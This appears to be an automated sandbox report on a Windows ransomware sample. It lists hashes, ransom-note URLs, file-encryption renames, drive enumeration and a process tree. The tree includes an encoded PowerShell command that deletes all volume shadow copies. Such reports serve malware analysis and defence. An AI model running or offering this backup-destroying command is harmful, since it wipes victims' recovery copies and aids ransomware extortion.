Analysis
-
max time kernel
138s -
max time network
178s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
24-01-2022 01:02
Static task
static1
Behavioral task
behavioral1
Sample
cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe
Resource
win10-en-20211208
General
-
Target
cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe
-
Size
115KB
-
MD5
193f84c1f7e306144ef53b019e46bd10
-
SHA1
4ab67ccfe975625992cf34c19c9bfc6d3a72ec38
-
SHA256
cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8
-
SHA512
dbe6f8fac6939bd14b7d476504a806aeab8b9b6a655cc6cbf10179452dd6707ca2ce3fa72653347417340a81d6a23e81bc8255dd4717cdfa20a1dc4c3756a7f9
Malware Config
Extracted
C:\y1i9oi-readme.txt
ryuk
https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spread
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/4E0774232C0833FA
http://decryptor.cc/4E0774232C0833FA
https://filehippo.com/download_tor_browser_for_windows/
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Modifies extensions of user files 16 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exedescription ioc process File opened for modification \??\c:\users\admin\pictures\PushRemove.tiff cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\users\admin\pictures\StopSet.tiff cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\users\admin\pictures\WatchSet.tiff cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File renamed C:\Users\Admin\Pictures\MeasureStep.raw => \??\c:\users\admin\pictures\MeasureStep.raw.y1i9oi cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\users\admin\pictures\CompleteRestart.tiff cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\users\admin\pictures\UnlockCheckpoint.tiff cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File renamed C:\Users\Admin\Pictures\InstallConvertTo.raw => \??\c:\users\admin\pictures\InstallConvertTo.raw.y1i9oi cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File renamed C:\Users\Admin\Pictures\ResolveExit.tiff => \??\c:\users\admin\pictures\ResolveExit.tiff.y1i9oi cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File renamed C:\Users\Admin\Pictures\StopSet.tiff => \??\c:\users\admin\pictures\StopSet.tiff.y1i9oi cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\users\admin\pictures\ResolveExit.tiff cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File renamed C:\Users\Admin\Pictures\CompleteRestart.tiff => \??\c:\users\admin\pictures\CompleteRestart.tiff.y1i9oi cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File renamed C:\Users\Admin\Pictures\PushRemove.tiff => \??\c:\users\admin\pictures\PushRemove.tiff.y1i9oi cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File renamed C:\Users\Admin\Pictures\WatchSet.tiff => \??\c:\users\admin\pictures\WatchSet.tiff.y1i9oi cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File renamed C:\Users\Admin\Pictures\BackupResolve.png => \??\c:\users\admin\pictures\BackupResolve.png.y1i9oi cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File renamed C:\Users\Admin\Pictures\UnlockCheckpoint.tiff => \??\c:\users\admin\pictures\UnlockCheckpoint.tiff.y1i9oi cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File renamed C:\Users\Admin\Pictures\JoinDeny.crw => \??\c:\users\admin\pictures\JoinDeny.crw.y1i9oi cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exedescription ioc process File opened (read-only) \??\L: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\T: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\V: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\A: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\G: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\X: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\N: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\O: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\P: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\S: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\U: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\F: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\J: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\K: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\W: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\I: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\M: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\Q: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\R: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\Y: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\B: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\E: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\H: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\Z: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened (read-only) \??\D: cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8rh10p88900m.bmp" cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe -
Drops file in Program Files directory 37 IoCs
Processes:
cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exedescription ioc process File opened for modification \??\c:\program files\ConnectMove.ppsm cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\OpenInstall.xla cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\RestoreInstall.fon cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\RevokeSet.m3u cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\SearchUnregister.M2V cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File created \??\c:\program files\y1i9oi-readme.txt cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File created \??\c:\program files (x86)\y1i9oi-readme.txt cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\AssertInvoke.vdw cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\SendConnect.midi cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\StopCheckpoint.pcx cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\WaitLimit.mpeg2 cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\y1i9oi-readme.txt cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\AssertUpdate.fon cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\TestUse.svgz cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\UnblockBlock.vstm cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\ConvertToMerge.ram cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\FindImport.AAC cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\UndoSync.mht cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\ResumeSend.crw cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\y1i9oi-readme.txt cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\ExitSubmit.AAC cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\ProtectUninstall.otf cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\PushUse.jfif cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\EnterInvoke.m1v cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\RepairEdit.xlsb cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\TestLimit.pptx cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\ApproveRead.vssm cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\EnterStart.dot cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\SkipConnect.php cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\SuspendSend.vb cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\EnterRedo.M2V cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\LockProtect.mp3 cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\PushStart.mp4 cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\y1i9oi-readme.txt cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\ResumeGet.emz cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\SetEnable.snd cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe File opened for modification \??\c:\program files\TestApprove.asf cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exepowershell.exepid process 1592 cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe 1472 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1592 cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe Token: SeDebugPrivilege 1472 powershell.exe Token: SeBackupPrivilege 1796 vssvc.exe Token: SeRestorePrivilege 1796 vssvc.exe Token: SeAuditPrivilege 1796 vssvc.exe Token: SeTakeOwnershipPrivilege 1592 cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exedescription pid process target process PID 1592 wrote to memory of 1472 1592 cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe powershell.exe PID 1592 wrote to memory of 1472 1592 cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe powershell.exe PID 1592 wrote to memory of 1472 1592 cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe powershell.exe PID 1592 wrote to memory of 1472 1592 cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe"C:\Users\Admin\AppData\Local\Temp\cd50529f1ebd3bc934d761d2e7da23a4225e90020ee9cd9d564df3db0aef3af8.exe"1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1472
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1136
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1796